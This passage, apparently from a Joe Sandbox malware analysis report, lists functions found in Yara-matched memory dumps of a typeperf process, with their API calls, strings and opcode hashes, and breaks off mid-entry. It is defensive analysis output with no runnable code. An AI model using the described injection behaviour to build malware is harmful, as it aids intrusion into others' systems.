                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 009a437a27ed2f7a2ab3cda45b2a5e922851ab81a4dc010835c3c622e567a834
                                                                                                                        • Instruction ID: 9add6f0e75c9e17be275f10f4b812f27b59de268a48e1aae7b39745adf8c16ae
                                                                                                                        • Opcode Fuzzy Hash: 009a437a27ed2f7a2ab3cda45b2a5e922851ab81a4dc010835c3c622e567a834
                                                                                                                        • Instruction Fuzzy Hash: 8B31BEB5600704EBD714DFA4D885FA7B7F8FB88300F10862EE9598B286D374B940CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 007021B1 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 2f20acebdfca3de1d805c10156facca151947e25a55291ba8a44d208bafac71a
                                                                                                                        • Instruction ID: 27776628c1f34e043c631dd62028be63494c73c77e0ac83e867b4fc65b619bf2
                                                                                                                        • Opcode Fuzzy Hash: 2f20acebdfca3de1d805c10156facca151947e25a55291ba8a44d208bafac71a
                                                                                                                        • Instruction Fuzzy Hash: 5531C0B5A00704EBD714DFA4DCC5BA7BBF9EB44300F108629E9599B286E374A951CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F8901 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 006F8A06
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3188754299-2766056989
                                                                                                                        • Opcode ID: bd9f38d072d94069550ba5f8591e7e741d4b4433d44b6a2e6f3bab2ad383c70b
                                                                                                                        • Instruction ID: 4b9c942e749c047d4e669cc5c98a9ec4bf2451f5ffb2b95a2e8e65a7ee8a1b48
                                                                                                                        • Opcode Fuzzy Hash: bd9f38d072d94069550ba5f8591e7e741d4b4433d44b6a2e6f3bab2ad383c70b
                                                                                                                        • Instruction Fuzzy Hash: FA7132B2900209EEDB24DB64CCC9FFBB3BDAF54300F044699B61997181EB74AB958B51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0070529A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,Cso,00000010,?,?,?,00000044,?,00000010,006F7343,?,?,?), ref: 00705303
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID: Cso
                                                                                                                        • API String ID: 2186235152-1417854071
                                                                                                                        • Opcode ID: 3cfa6bc68db8286e614621698ba3190c077ffbb7deee45df6bbe48e66e68cbff
                                                                                                                        • Instruction ID: 8728b8fa7d17595b83565373b9132e5d77aab7123441972bb21d0d55b4d03612
                                                                                                                        • Opcode Fuzzy Hash: 3cfa6bc68db8286e614621698ba3190c077ffbb7deee45df6bbe48e66e68cbff
                                                                                                                        • Instruction Fuzzy Hash: 1C1139B2205549AFCB08DF98DC85EEB77A9EF8C714F014248FA0AD7251DA34E852CB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 007052A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,Cso,00000010,?,?,?,00000044,?,00000010,006F7343,?,?,?), ref: 00705303
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID: Cso
                                                                                                                        • API String ID: 2186235152-1417854071
                                                                                                                        • Opcode ID: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction ID: 38301c182b127a9f6249562f03e4be262201342756113337cb70f303940d51b3
                                                                                                                        • Opcode Fuzzy Hash: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction Fuzzy Hash: 2701C8B2211509BBCB44DE89DC81EEB77ADAF8C714F408109BA09D3241DA30F8518BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00705205 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 0070524C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID: -o
                                                                                                                        • API String ID: 3298025750-420917946
                                                                                                                        • Opcode ID: d8b306892d8606a62299baf7e2a6639e41849263605d610f6cfd06968e66af16
                                                                                                                        • Instruction ID: 221d3a92acc6c98b6c7bc027d59c50132c3a480d6c9a259504cd5adfd9d2a4d4
                                                                                                                        • Opcode Fuzzy Hash: d8b306892d8606a62299baf7e2a6639e41849263605d610f6cfd06968e66af16
                                                                                                                        • Instruction Fuzzy Hash: 75F0A7B5200609BBD610DE58DC41FDB33ECDF85714F000505FD4CA7242C63179118BB8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00705210 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 0070524C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID: -o
                                                                                                                        • API String ID: 3298025750-420917946
                                                                                                                        • Opcode ID: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction ID: 1f5f5a001c5932e8e411cbf1805c0102990cdb27c5f8655c2fd68a0adf4be091
                                                                                                                        • Opcode Fuzzy Hash: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction Fuzzy Hash: F1E06D71200609BBD610EE59DC45FEB33ECDF89710F004408FD08A7242DA70B9518AB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006FE28B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 006FE2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        • Opcode ID: f3887c4531889087e89bf742d080641379a60d0c39df3a7be98db3b949d363f5
                                                                                                                        • Instruction ID: 99f26b5ab89c892ba0be7063ee583ef9804b2d62a8c1b9ddefad84a281756667
                                                                                                                        • Opcode Fuzzy Hash: f3887c4531889087e89bf742d080641379a60d0c39df3a7be98db3b949d363f5
                                                                                                                        • Instruction Fuzzy Hash: C43130B6A0060ADFDB00DFD8D8809EFB7BAFF88304B108559E505EB254D775EE058BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006FE290 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 006FE2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        • Opcode ID: d2ad74de19692b63ac0a36c10c72401cbc70f1131e5eb859e7051404c2950e98
                                                                                                                        • Instruction ID: a19e2c187fbd30cc92b829dc58d5263cae545e26f58d0522e3092bce2577cd5d
                                                                                                                        • Opcode Fuzzy Hash: d2ad74de19692b63ac0a36c10c72401cbc70f1131e5eb859e7051404c2950e98
                                                                                                                        • Instruction Fuzzy Hash: C7310FB6A0060ADFDB00DFD8D8809EFB7BABF88304B108559E515EB254D775EE458BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F3F00 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006F3F72
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction ID: e78136a97ca3ed62751f0eb9ca94c19c96ca2ddf941ed7e57fbcb9f128aa815d
                                                                                                                        • Opcode Fuzzy Hash: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction Fuzzy Hash: DB0112B5D0020DE7DB14DBA4DD46FEDB3B99B54308F004295BA0897281F675EB15C791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006E9940 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 5063638a2c36aa17fdc4f42d11aef01adc69ceda02bd84804e6c7a4b00b0560a
                                                                                                                        • Instruction ID: bce15f1737f3410debf69473ee84a2df9d4a4aea17cf4c57d385079b8d122e21
                                                                                                                        • Opcode Fuzzy Hash: 5063638a2c36aa17fdc4f42d11aef01adc69ceda02bd84804e6c7a4b00b0560a
                                                                                                                        • Instruction Fuzzy Hash: F9F065733407047AE22062AA9C02FDB778CDB85761F140429F61CDA2C2D995B41146E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006E993F Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 03457372c09b1ed5863a6cdbec27e54c16f22d8d3bf367779d6dfa49f3637d11
                                                                                                                        • Instruction ID: 3bb78fcec70efe68729c131f48a92377fa08fbcfecf9a084af3302cd8766372c
                                                                                                                        • Opcode Fuzzy Hash: 03457372c09b1ed5863a6cdbec27e54c16f22d8d3bf367779d6dfa49f3637d11
                                                                                                                        • Instruction Fuzzy Hash: 05F09272680704BAE37062A99C03FEB679C9F95751F24011DF61CEB2C2D9A578018AA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 007051C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(006F1D56,?,0070399B,006F1D56,007032B7,0070399B,?,006F1D56,007032B7,00001000,?,?,00706A10), ref: 007051FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: 9fdd506a88285f9c77a0d687126b27aa8a0a4cea2cb7997e98955cd383412e9f
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: CCE06572600208BBD610EE99DC45FEB33ACEF89710F004409F908A7282DA30B9118AB8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F7380 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 006F73AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction ID: be04a2090fd86309dc1e616a7842cbae63ffb16563565e98dd533410e9f738a1
                                                                                                                        • Opcode Fuzzy Hash: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction Fuzzy Hash: EEE02072144B0C7BF720557CDC45FB633484748720F144650BD2CCB3C2E138F90155A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F718D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,006F182A,006F1F99,007032B7,00000000), ref: 006F71C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction ID: ff7086a534529e7237a642438d51a235c5f7fd244a7886c37ba596edecd9b7c1
                                                                                                                        • Opcode Fuzzy Hash: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction Fuzzy Hash: BAE02B756443087EF710E3F59C03FEE26890B44391F144078B90CEB3C3F964E0024955
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 006F7190 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,006F182A,006F1F99,007032B7,00000000), ref: 006F71C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction ID: 5c5a584d49f0b5dca9687c171e798bab07bc1a57d187a507af083515ee5f91ce
                                                                                                                        • Opcode Fuzzy Hash: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction Fuzzy Hash: A9D02E71640308BFF200E2F18C03FAA328D4B083A1F044028BA0CEB3C2F864F00109AA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                                                        • Instruction ID: f292cf21296255019f896a589b75333d1d1aa59b17bb375139c3af48e825d93f
                                                                                                                        • Opcode Fuzzy Hash: c1b6663d98e2b5e07814846b8e6ca7dc30cd8ddddbfe0c1f3aedfa67d6020662
                                                                                                                        • Instruction Fuzzy Hash: 87B09B719035C5C5EA51F7608608717794867D1701F19C471D2030741F4779D1E1E275
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 006EE0C7 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction ID: f74229302ae57d0a695195075afe3f3cc7563fba292a3a0c6b2ebe86dee0d1e0
                                                                                                                        • Opcode Fuzzy Hash: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction Fuzzy Hash: 14C08C32E0A0041BD2100C0D78022B8F3A4E78B122F0421A7EC6CE3A00B10BD02E108D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03032890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 74ceeb15bf15edab9157ca495845553239b81aa06ce6e541d63c405d3439499a
                                                                                                                        • Instruction ID: b5c0a27e39ca8c1c7c28af03a6a6445616050d457b7372744b49ecc9f07a85f0
                                                                                                                        • Opcode Fuzzy Hash: 74ceeb15bf15edab9157ca495845553239b81aa06ce6e541d63c405d3439499a
                                                                                                                        • Instruction Fuzzy Hash: 3A5107B6B01216BFDB10DF98C89097EF7FCFB49200B548A6AE565E7645D334DE408BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 1b0d0f93e71f6987a4e01bfb267311063ba8035947e8f7c86778765a4b63ff9b
                                                                                                                        • Instruction ID: 558499175086e9a171364c661b26d5c12220aeddfd53f2f96ab7486b6e5ab645
                                                                                                                        • Opcode Fuzzy Hash: 1b0d0f93e71f6987a4e01bfb267311063ba8035947e8f7c86778765a4b63ff9b
                                                                                                                        • Instruction Fuzzy Hash: E45125B5A01A45AEDB20DFACD8809BFF7FDEB44200B088CB9E596D7641E770DA008760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03027630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03064655
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03064742
                                                                                                                        • ExecuteOptions, xrefs: 030646A0
                                                                                                                        • Execute=1, xrefs: 03064713
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03064787
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030646FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03064725
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 1c06f721147f6e1b9ca6fb662021a84567564d38c00037484b530df96b451b29
                                                                                                                        • Instruction ID: c971ce51075edcc5ae04bd692512ba21271271aac6bd158b3b4eb746eb79083f
                                                                                                                        • Opcode Fuzzy Hash: 1c06f721147f6e1b9ca6fb662021a84567564d38c00037484b530df96b451b29
                                                                                                                        • Instruction Fuzzy Hash: B2514A35A023297AEF11EBA5DC89FEE7BADEF44B00F0804D9D505AB182D771AA458F50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 030C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
